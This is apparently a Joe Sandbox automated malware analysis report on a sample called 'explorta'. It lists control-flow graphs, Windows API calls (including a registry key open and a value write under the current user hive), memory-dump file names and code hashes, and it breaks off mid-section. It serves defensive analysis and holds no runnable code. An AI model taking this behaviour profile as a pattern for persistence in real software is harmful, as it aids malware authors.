                                                                                                                                                                                                                                          control_flow_graph 1352 596020-59605b RegOpenKeyExA 1353 59605d-596086 RegSetValueExA 1352->1353 1354 596087-596096 1352->1354 1353->1354 1356 596098-5960a4 1354->1356 1357 5960c4-5960dc 1354->1357 1360 5960ba-5960c1 call 5ace48 1356->1360 1361 5960a6-5960b4 1356->1361 1358 5960de-5960ea 1357->1358 1359 596106-59611e 1357->1359 1362 5960fc-596103 call 5ace48 1358->1362 1363 5960ec-5960fa 1358->1363 1364 596148-596155 call 5ac7d1 1359->1364 1365 596120-59612c 1359->1365 1360->1357 1361->1360 1366 596156-59615b call 5c644a 1361->1366 1362->1359 1363->1362 1363->1366 1371 59613e-596145 call 5ace48 1365->1371 1372 59612e-59613c 1365->1372 1371->1364 1372->1366 1372->1371
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,000F003F,?), ref: 00596053
                                                                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(80000001,?,00000000,00000002,?,?), ref: 00596081
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: OpenValue
• String ID:
• API String ID: 3130442925-0
• Opcode ID: 15ce590e69bbc84a04e7a66b566e2845944420324b67d7e9971291affdeff16b
• Instruction ID: 0050e79ac0384f23b0afd982cb5c56f4f3b840a4d939918b19723f6a324d5cb4
• Opcode Fuzzy Hash: 15ce590e69bbc84a04e7a66b566e2845944420324b67d7e9971291affdeff16b
• Instruction Fuzzy Hash: 4331CF71210148AFEF18DF28CD89BAD7F66FF85340FA08218F90597296D73AD984CB90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph; edge list omitted)
• Function entry: 5c6549; basic blocks 5c6549-5c6626
• API calls: CreateFileW, FindCloseChangeNotification
• Internal calls: 5c38d0, 5c6ce0, 5c6cf3, 5c643a, 5c6627, 5c66b1
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0780e590c234974346c52d5b20da5fd0e918c54b4e2327d4d0518c38186148e4
• Instruction ID: 2a148d9c4d3855c7da91d2d7d455684af5e2c7765a71f38ffea71dc5568b2a00
• Opcode Fuzzy Hash: 0780e590c234974346c52d5b20da5fd0e918c54b4e2327d4d0518c38186148e4
• Instruction Fuzzy Hash: 8E21B8729411097EDB116BE49C49F9E7F29FF82374F200219F9642B1C1D7709F0596A1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph; edge list omitted)
• Function entry: 5ccda4; basic blocks 5ccda4-5ccffb
• API calls: RtlAllocateHeap
• Internal calls: 5ad770, 5c9f38, 5ccd2e, 5cccec, 5c6cf3, 5c643a, 5c853b, 5ccf37, 5c8583, 5c5dcd, 5ccd9b (called twice), 5c9de1, 5c9531, 5c85a9
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a500fc218d2d6375231f49286525919e489325a7d83753598a782e543b31d798
• Instruction ID: 49a194de2fb7cfa41cd029c03373853e48fdecb82c261bbd59bbd4bd0797e5f9
• Opcode Fuzzy Hash: a500fc218d2d6375231f49286525919e489325a7d83753598a782e543b31d798
• Instruction Fuzzy Hash: 4A61C236D002159FDF25ABE8D889FEDBFA5FB56310F24402EE44AAB291D6308D44C791
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph; edge list omitted)
• Function entry: 597e50; basic blocks 597e50-598041
• API calls: GetNativeSystemInfo
• Internal calls: 5c38d0, 5a71e0, 595d40, 5ac7d1, 5ace48, 5c644a
APIs
• GetNativeSystemInfo.KERNELBASE(?), ref: 00597FF4
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: InfoNativeSystem
• String ID:
                                                                                                                                                                                                                                          • API String ID: 1721193555-0
                                                                                                                                                                                                                                          • Opcode ID: edc3f4143234a0caecdecb34e625319bcbb0b8a5ae79a3caf4ca73388f31c364
                                                                                                                                                                                                                                          • Instruction ID: 4fda9902e784c58247c91e3c78a4fbc2ce200ff15d5301fa9aa49b73382492ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edc3f4143234a0caecdecb34e625319bcbb0b8a5ae79a3caf4ca73388f31c364
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D51F871D142089BEF24EB68CD4DBEDBF75FB46310F504299E414A72C2EB359AC48B91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 1610 5c6821-5c6837 1611 5c6839-5c683d 1610->1611 1612 5c6847-5c6857 1610->1612 1611->1612 1613 5c683f-5c6845 1611->1613 1617 5c6859-5c686b SystemTimeToTzSpecificLocalTime 1612->1617 1618 5c6897-5c689a 1612->1618 1614 5c689c-5c68a7 call 5ac7d1 1613->1614 1617->1618 1620 5c686d-5c688d call 5c68a8 1617->1620 1618->1614 1622 5c6892-5c6895 1620->1622 1622->1614
APIs
• SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 005C6863
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: Time$LocalSpecificSystem
• String ID:
• API String ID: 2574697306-0
• Opcode ID: 3613b0bd3466e776c26303714786d3411aa282c8b29474ba00a2d76a7d25ca85
• Instruction ID: d070ee14cf644f9ff5ae70d872fcc7b5b00828938f1fa9f3e5abd21768ff1657
• Opcode Fuzzy Hash: 3613b0bd3466e776c26303714786d3411aa282c8b29474ba00a2d76a7d25ca85
• Instruction Fuzzy Hash: 571196B290010DAFDF11DAD5C985EDF7BFCAF48310F60526AE515E6180EA35EB488BA1
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
control_flow_graph 1623 5ccf9f-5ccfaa 1624 5ccfac-5ccfb6 1623->1624 1625 5ccfb8-5ccfbe 1623->1625 1624->1625 1626 5ccfec-5ccff7 call 5c6cf3 1624->1626 1627 5ccfd7-5ccfe8 RtlAllocateHeap 1625->1627 1628 5ccfc0-5ccfc1 1625->1628 1633 5ccff9-5ccffb 1626->1633 1630 5ccfea 1627->1630 1631 5ccfc3-5ccfca call 5c9531 1627->1631 1628->1627 1630->1633 1631->1626 1636 5ccfcc-5ccfd5 call 5c85a9 1631->1636 1636->1626 1636->1627
APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,005C9E9D,?,?,005C612A,?,00000000,?,?,005C6D5E,?,00000000), ref: 005CCFE1
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
• Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 971c80ea36c352aa94ed41dbee3532ba72d6eb944413cf505ba0b803fe60de7b
• Instruction ID: 13ee6b109a7b94f86604b0ddb02cb8c2f52be1b4b4ac60c158965e12d0d6175a
• Opcode Fuzzy Hash: 971c80ea36c352aa94ed41dbee3532ba72d6eb944413cf505ba0b803fe60de7b
• Instruction Fuzzy Hash: C8F0B4325442256E9B212BE15C15F6B7F8AFF923A0B14541EFD0CEA181CB70DD0081E0
Uniqueness
Uniqueness Score: -1.00%
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,031683DB,?,?,005ACBE1,031683DB,?,005A726B,?,?,?,?,?,?,00596FE5,?), ref: 005CA7EE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279760036-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_590000_explorta.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3346348778.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5320000_explorta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3346348778.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5320000_explorta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3346348778.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5320000_explorta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3346348778.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5320000_explorta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3346348778.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5320000_explorta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.3346348778.0000000005320000.00000040.00001000.00020000.00000000.sdmp, Offset: 05320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_5320000_explorta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 47f2d23dac9dd5a5bc797312a25df342248075691203b93a9a794916a25f4ba6
                                                                                                                                                                                                                                          • Instruction ID: 30f4492369e6da860a3d86c48e7ee49e3fdd69e747b8c5ab29200a805cd7d4b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47f2d23dac9dd5a5bc797312a25df342248075691203b93a9a794916a25f4ba6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2F0B4E720E160AE7455C8477FA4AFB636DD6D6735330853BF942C7182C15A8D8E6132
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                          • Opcode ID: aaf67ca2e0fcdbc21fb72ba5683826d92a16507e1b693b4a0e91b495c2e11504
                                                                                                                                                                                                                                          • Instruction ID: cfeeade7d907526e75037d00a0b156d8c53c9a2be2ef0dc0c6aaaf8e60df1453
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaf67ca2e0fcdbc21fb72ba5683826d92a16507e1b693b4a0e91b495c2e11504
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0C22771E086298FDB35CE28DD447AABBB5FB98304F1445ABD84DA7240E774AE818F41
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0ace9fcb4f62d81112caa0248d520c372debca230bc35019f2ded4e7fce015b3
                                                                                                                                                                                                                                          • Instruction ID: 5e7098bb648e6b1cc140c1c7b78852f87cd18677c2b32e1785800a6c40d4b419
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ace9fcb4f62d81112caa0248d520c372debca230bc35019f2ded4e7fce015b3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EF13C71E002199FDF24CFADC9906ADBBB1FF98314F15826BE819AB341D731A941CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemTimePreciseAsFileTime.KERNEL32(?,005AC732,?,?,?,?,005AC767,?,?,?,?,?,?,005ABCDD,?,00000001), ref: 005AC3E3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$FilePreciseSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1802150274-0
                                                                                                                                                                                                                                          • Opcode ID: 566bc491abd171c717608ad040914ab70fa8b564f7fa2703411e84d55aab8077
                                                                                                                                                                                                                                          • Instruction ID: 12e192fbe9efe7e47d940b5f62bbcd8aa950bd6ff2ba0833645a0ee7cee5343d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 566bc491abd171c717608ad040914ab70fa8b564f7fa2703411e84d55aab8077
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FD02232A02138938E012B80EC888BDFF88EF03B203050012FA05AB120CA609C00ABF0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Memory Dump Source
